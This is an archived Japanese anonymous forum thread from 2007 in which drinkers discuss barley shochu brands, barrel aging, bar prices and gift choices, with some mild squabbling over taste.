樫樽に限らず木樽貯蔵はやめていただきたいとおもっております。

ウイスキーと焼酎混ぜたようなわけのわからない焼酎のむくらいなら
最初からウイスキー飲みますよ。

お願いだから樽貯蔵なんかしないで普通にかめやステンレスタンクで貯蔵して欲しいです。



356 :呑んべぇさん:2007/01/03(水) 15:23:20
兼八の香ばしさは麦麦萬年とあまり変わらない感じだな。
好みによれば萬年のほうが美味いかもしれない。

357 :呑んべぇさん:2007/01/03(水) 16:06:00
>>354
樽熟成物は確かにうまい。だが、焼酎としてはどうかと思う。本来の原材料の
味を消してしまっているし。樽材料も海外に頼っていることだろうし。
何よりスナックやラウンジを樽貯蔵焼酎が占領しているのが違和感あり。

358 :呑んべぇさん:2007/01/03(水) 18:26:59
そうしないと飲めないからだよ・・
あの手の麦焼酎の樽貯でないものは飲めたものではない。
まあ、いろいろなバリエーションの焼酎があっていいんじゃない。

359 :呑んべぇさん:2007/01/03(水) 18:54:06
そういや街のスナックはこの10年でローヤル、リザーブから神の河に
変わったよなあ。

360 :呑んべぇさん:2007/01/03(水) 23:10:58
俺は樽貯蔵では隠し蔵が好き。麦の香りが少なく木の香りが心地よく感じる。

361 :呑んべぇさん:2007/01/03(水) 23:51:16
みんなはどんなんのんでる?

362 :呑んべぇさん:2007/01/04(木) 10:01:31
樽貯蔵関連は別スレでもいいかな?
麦がメインだけど黒糖や米にもあるし。



363 :呑んべぇさん :2007/01/04(木) 12:33:47
俺が行く呑み屋 麦焼酎は
中々、三段じこみ、兼八、むんのら、百年の孤独しか、置いてない

364 :呑んべぇさん:2007/01/04(木) 16:33:16
>363
有名銘柄ばかりでつまらん飲み屋だな。
店主はきちんと焼酎を勉強していないんだろうなぁ。

365 :呑んべぇさん :2007/01/04(木) 18:39:38
そーなんですよ。
もう少し種類を多くして貰いたいが、なかなか頑固で麦はこれだけ!との事。
ま〜 焼酎全て400円だから我慢してる。(芋は40種類位ある)

366 :呑んべぇさん :2007/01/05(金) 10:41:16
>>365
あたりまえだ!400円なら文句言うな!
うちン所は、兼八でさえ1000円も取る、むんのら、百年の孤独は2000円じゃ!!!

367 :呑んべぇさん:2007/01/07(日) 01:09:16
転勤先から出戻りで10数年ぶりになじみのスナックへ。当時、山崎や
ローヤルが主流だったのに神の河とスーパーいいちこに変わっていた。


368 :呑んべぇさん :2007/01/08(月) 02:37:59
麦焼酎といえば
ゑびす酒造・・けいこうとなるも


369 :呑んべぇさん:2007/01/08(月) 03:15:17
宝の黒壁蔵熟飲んでる、いやぁ酔った
黄色い色だしまぁいいんじゃね、初心者おすすめ

370 :呑んべぇさん:2007/01/08(月) 06:11:34
>>369 あの前割りしてあるワンカップものだね。 まったりアマメで、樽風味もくどくなくて、いいよね。

371 :呑んべぇさん :2007/01/14(日) 08:40:57
むんのら飲めるとこ、おしえて〜

372 :呑んべぇさん:2007/01/22(月) 13:45:38
誰も知らないらしい

373 :呑んべぇさん:2007/01/22(月) 15:15:28
武○酒店で買えば?

374 :呑んべぇさん:2007/01/23(火) 08:01:08
ペットボトルで売ってるおつな麦とかうまかもんね麦とかってうまいの?

375 :呑んべぇさん:2007/01/23(火) 08:30:24
>374
少しは自分で試せ

376 :呑んべぇさん:2007/01/23(火) 10:21:48
悟空の眠蔵

377 :呑んべぇさん:2007/01/23(火) 23:16:46
百年の孤独のボンボン(チョコの中にお酒が入ってるやつ)があるって聞いたんですが、どこで売ってるかとか知ってる方居ませんか?

378 :呑んべぇさん:2007/01/24(水) 10:49:57
ヤフオク

379 :呑んべぇさん:2007/01/24(水) 14:19:27
>>377
マチダヤ

380 :呑んべぇさん:2007/01/24(水) 15:21:03
うまいねむぎまろ

381 :呑んべぇさん:2007/01/24(水) 15:27:31
はだか麦は兼八よりも初潮が一番ウマイ

382 :呑んべぇさん:2007/01/24(水) 15:35:52
>>377
銀座、新地で人気だな

383 :呑んべぇさん:2007/01/24(水) 17:50:57
やはり天の刻印だな。
うますぎる。

384 :呑んべぇさん:2007/01/24(水) 20:46:49
新宿で美味い麦焼酎が揃ってるお店を知りませんか?薦めていただけると
嬉しいです。

385 :呑んべぇさん:2007/01/24(水) 20:55:44
>>384
飲める店なのか、買える店なのかどっちだ?

386 :呑んべぇさん:2007/01/24(水) 21:05:28
ごめんなさい。飲める店です。

387 :呑んべぇさん:2007/01/24(水) 21:18:41
>>386
オレがよく行くのは、うま○房だな。
兼八を安く飲める。

388 :呑んべぇさん:2007/01/26(金) 17:15:50
博多の華の一升瓶が手元にあるんだがこれってどうよ?

389 :呑んべぇさん:2007/01/26(金) 19:33:36
飲んでみればいいジャマイカ

390 :呑んべぇさん:2007/01/26(金) 19:37:17
銀の水はどんな感じですか?

391 :呑んべぇさん:2007/01/26(金) 21:21:51
神の河でいいだろ?安くて旨い。

392 :呑んべぇさん :2007/01/26(金) 21:24:49
>>388
手元にある以上、飲み干して下さい。味は、保障しかねますのであしからず。

393 :呑んべぇさん:2007/01/27(土) 07:51:44
勇者ってうまいと思うんだけど・・・ だめ?


394 :呑んべぇさん:2007/01/27(土) 16:14:53
藻前が美味いと思うことは、だめじゃない。

395 :呑んべぇさん:2007/01/27(土) 16:15:05
最近焼酎を飲み始めました。
いいちこはとてもうまいと思うけど、ここでは安酒の部類に入るんだね。少し驚いた。

396 :呑んべぇさん:2007/01/27(土) 16:23:53
安くてうまいのが1番だよ。

397 :呑んべぇさん:2007/01/27(土) 19:43:03
>363
よほどその店、料理に自信が無いんだな 笑



398 :呑んべぇさん:2007/01/27(土) 20:17:42
???

399 :呑んべぇさん:2007/01/27(土) 22:02:32
兼八買いに酒屋に行ったんですけど、値段見たら一升瓶が10000円
するんですよ。アホかと思って買わなかったんですけど皆さんこんなに
高い焼酎飲んでるんですか?
それと、兼八なみの香りを楽しめる麦焼酎って知りませんか?
お願いします。

400 :呑んべぇさん:2007/01/27(土) 22:07:24
>>399
定価で買えよ

401 :呑んべぇさん:2007/01/27(土) 22:16:54
定価って、値札は10000円でしたよ。
それで、常圧蒸留の麦焼酎、高千穂っていうの買ってきたんですけど
アホかこれ芋焼酎と同じ味じゃないですか。
やられたー。

402 :呑んべぇさん:2007/01/27(土) 23:29:48
これはひどい

403 :呑んべぇさん:2007/01/28(日) 00:25:28
高千穂の味が芋焼酎とかどういう味覚してるんだか

404 :呑んべぇさん :2007/01/28(日) 09:09:20
>365,>387みたいな、安く呑める店に行けば手っ取り早く
色々な有名銘柄(兼八も含む)の焼酎が呑めるよ。

405 :呑んべぇさん:2007/01/28(日) 09:34:20
>>399
兼八が手に入らないオイラのオススメだす。
1.ちんぐ黒
2.万年星
3.藤の露(Newラベルの方)
4.特蒸泰明
5.初潮

406 :呑んべぇさん:2007/01/28(日) 09:49:35
>>405
味覚障害のようだからオススメ言っても無駄。

407 :呑んべぇさん:2007/01/28(日) 10:15:23
何が味覚障害なんだ。
言ってみろよ。
高千穂のんだら芋焼酎となんら変わらないって思うのは
普通だぜ。お前なんだよ。
高千穂飲んだことないから口からでまかせ言ってんだろ。
ちゃんと飲めよ、アホ。

408 :呑んべぇさん:2007/01/28(日) 10:19:10
>>404さん
色んなお酒飲むには良さそうですね。
>>405さん
参考になりました。これから買いにいこうかな、でもあるかな^^


409 :呑んべぇさん:2007/01/28(日) 10:22:00
味覚障害は言い過ぎだな。
でも、芋焼酎と変わらないって思うのは普通だぜも言い過ぎだな

410 :呑んべぇさん:2007/01/28(日) 10:39:27
>>407>>408の態度の差がひどい

411 :呑んべぇさん:2007/01/28(日) 12:08:05
味覚と嗅覚と人格に問題有りだな。

412 :呑んべぇさん:2007/01/28(日) 12:44:55
高千穂飲むと昔古典で習った芋粥食いたい下級貴族の話を思い出す・・・

413 :呑んべぇさん:2007/01/28(日) 12:47:48
ヒドイ態度の人は、焼酎の味もひどく感じるんだな。

414 :呑んべぇさん:2007/01/28(日) 12:59:11
>>412 ああ、あったな。 芥川龍之介もそれを翻案して芋粥と言う短編書いている。

415 :呑んべぇさん:2007/01/28(日) 13:49:38
かねはちとおこげ 同じに思えた私も味覚に難あり?友人には笑われた。

416 :呑んべぇさん :2007/01/28(日) 18:52:54
>>409
確かに、高千穂の臭いは芋焼酎と似ている。でも、芋のほのかな甘味とはまた違う香ばしい味がいいのです。
今の麦焼酎に、高千穂のように常圧の独特のにおいのあるものが少なくなっている。
それだけに、高千穂は昔ながらの麦焼酎の味、香りでありながら、他の麦焼酎の影響で、芋と似ているといわれているようです。


417 :呑んべぇさん:2007/01/28(日) 20:04:02
それさ、黒麹の香りと間違えてるだろ

418 :呑んべぇさん:2007/01/28(日) 20:37:45
人間が貧しければ舌も貧しいと言う事ですかね。

419 :呑んべぇさん:2007/01/28(日) 21:38:25
恥ずかしい人にばかり語られる高千穂(´・ω・) カワイソス

420 :呑んべぇさん:2007/01/28(日) 22:58:13
ああ、俺の愛飲する高千穂が・・・

421 :呑んべぇさん:2007/01/29(月) 23:10:04
新宿の「高庵」という店が焼酎が揃っていてお奨めです。最近行ってないので、
久しぶりに行きたいです。

422 :呑んべぇさん:2007/01/30(火) 01:06:12
質問です。大分県民なんだが今度法事をするときにお土産に
焼酎を渡そうと思うんだけど、俺は舞香にしようと思ったが
嫁が万人向けなフラスコがいいというんだがそんなもんかなぁ

423 :呑んべぇさん:2007/01/30(火) 03:46:06
フラスコでいいのでは?


424 :呑んべぇさん:2007/01/30(火) 07:38:27
>422
何人かは舞香の方を喜んだり、焼酎に対して認識を変えてくれそうだけど、
法事とかで出すならフラスコの方が良いと思うぞ。

でも仮に舞香4合を出すことを検討しているとしてそれがフラスコになると予算的には倍だよな。
少ない奴がわかってくれればいいんじゃ!って嫁を押し切ってもいいかなぁ。

425 :呑んべぇさん :2007/01/30(火) 22:06:11
>>417
黒麹よりも常圧の香りではないのかな?

426 :呑んべぇさん:2007/01/30(火) 23:42:46
お前さあ、飲みが足りないんだよ

427 :呑んべぇさん:2007/01/31(水) 20:10:10
いや、利き酒してる人は味の素やタバコ控えてますか?
コンビニの弁当、加工食品、スーパーの惣菜、弁当屋さん
みんな味の素使ってるので、気を付けてください。
タバコはアスファルトを舐めてるのとおなじですので(コールタールね)。
その上で、呑み比べお願いします。


428 :呑んべぇさん:2007/01/31(水) 20:31:27
阿呆発見…

429 :呑んべぇさん:2007/02/01(木) 13:52:58
俺は煙草もう辞めたけど、
味が分かんないってことは無かったよ。


430 :422:2007/02/01(木) 21:52:16
レスども。舞香で押しきりますノ

431 :呑んべぇさん:2007/02/02(金) 09:44:09
煙草やめてから酒の量が増えた

432 :呑んべぇさん:2007/02/02(金) 14:33:41
>430
ちゃんと箱入りにするんだぞ。


433 :呑んべぇさん:2007/02/04(日) 05:21:10
むぎまろうまいね
トロトロかぽかぽ飲んじゃうよ

434 :呑んべぇさん:2007/02/04(日) 17:37:56
>>432
ノシ

435 :呑んべぇさん:2007/02/05(月) 02:38:55
度数も値段も高かったけど、古久がめちゃくちゃ美味かった

436 :呑んべぇさん:2007/02/05(月) 03:45:05
古久のなんだろ?

437 :呑んべぇさん:2007/02/05(月) 11:51:11
初潮があればそれでいい

438 :呑んべぇさん:2007/02/05(月) 18:10:11
いいちこって20度と25度のがあるけど、
このスレで話題になっているのはどっちですか?

439 :呑んべぇさん:2007/02/05(月) 19:03:42
>>438
いいちこフラスコ

440 :呑んべぇさん:2007/02/07(水) 23:40:20
>>436
与作
他のが都内で買えるところってあるのかな

441 :呑んべぇさん:2007/02/10(土) 16:02:44
> (2003年)2月9日に発掘あるある大辞典で焼酎が取り上げられました。ご覧になられた方
> もいらっしゃると思います。わたくしのんべえもしっかり見ました。そこで、
> ちょっとおかしいと思ったことがあるので急遽ものもうすとして取り上げました。
>
> まず焼酎は太らないについて、以前メルマガでも焼酎のカロリーについて取り上
> げたことがあります。確かに焼酎自体では太ることはないというのはいいのです
> が、番組で初めの方で取り上げていたのは、乙類焼酎ではなく甲類焼酎でした。
>
> 甲類焼酎はおもに居酒屋で出されるサワー等に用いられております。このサワー
> に用いられるもの、レモン等の味となるもののカロリーなどは無くならないと
> いう事です。あの放送だけを見ていると焼酎で割って飲むと太らないと取られて
> も仕方が無いと思うのですが。ご覧になられた方はいかがでしょうか。
>
> 次に、におい(香り)でも血栓を溶かす作用があると番組では紹介されていました。
> これは後半の方で乙類焼酎のときに説明があったのでいいのですが、あの部分だ
> けを見ると焼酎=血栓を溶かすと思われるのではないかと思います。
>
> 焼酎という囲いでは乙類も甲類も含まれてしまいます。しかし、甲類というのは
> 元々、無味無臭です。最近では匂いつけにあるものを添付しているものまである
> ようです。つまりにおい(香り)で血栓を溶かす作用があるのは乙類(本格焼酎)で
> あるということを認識しておいてください。
>
> あのように科学的に分析できるのはさすがにメディアの力だと思います。
> が、甲類と乙類では性質も違うのできちんと分けて説明をしてくれればと思いま
> す。
http://www.kikuyashuhan.co.jp/shop/nonbei/vol34.html

442 :酒好き:2007/02/17(土) 01:44:32
麦焼酎は博多の華三年貯蔵と隠し蔵と神の河がいいと思う。私ははまってしまった。


443 :呑んべぇさん:2007/03/03(土) 02:53:14
それはとてもよい選択

444 :呑んべぇさん:2007/03/03(土) 03:30:42
会社の人に兼八もらった。

初めて呑むんだが、どんな呑みかたがオススメ?
ロック?お湯割り?

445 :呑んべぇさん:2007/03/03(土) 04:21:18
ラッパでよくね?

446 :呑んべぇさん:2007/03/03(土) 06:06:03
21禁にしたほうがいいな

447 :呑んべぇさん:2007/03/17(土) 18:46:43
とっぱい、マジ美味いな〜
舞香みたいなム〜ッとした混沌系が好きな人には合わんかもしれんけど
おれは竹を割ったようなシュッとしたかつ爽やか芳香のとっぱいはマジ好みやわぁ
これで常圧っちゅうのも意外やな〜さいこ

448 :呑んべぇさん:2007/03/20(火) 20:56:38
そうそう、とっぱいって常圧とはおもえない

449 :呑んべぇさん:2007/03/21(水) 10:47:01
おっぱい

450 :呑んべぇさん:2007/03/23(金) 20:19:53
とっぱいは減圧スッキリ系常圧焦がしガツン系とも違う第三勢力だな。
いわゆるスムース系

個性が強過ぎて料理と合わせ難く飽きが来るガツン系よりも晩酌の友たり得ると思う。

常蔵常圧もとっぱいみたいな感じ。

76 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)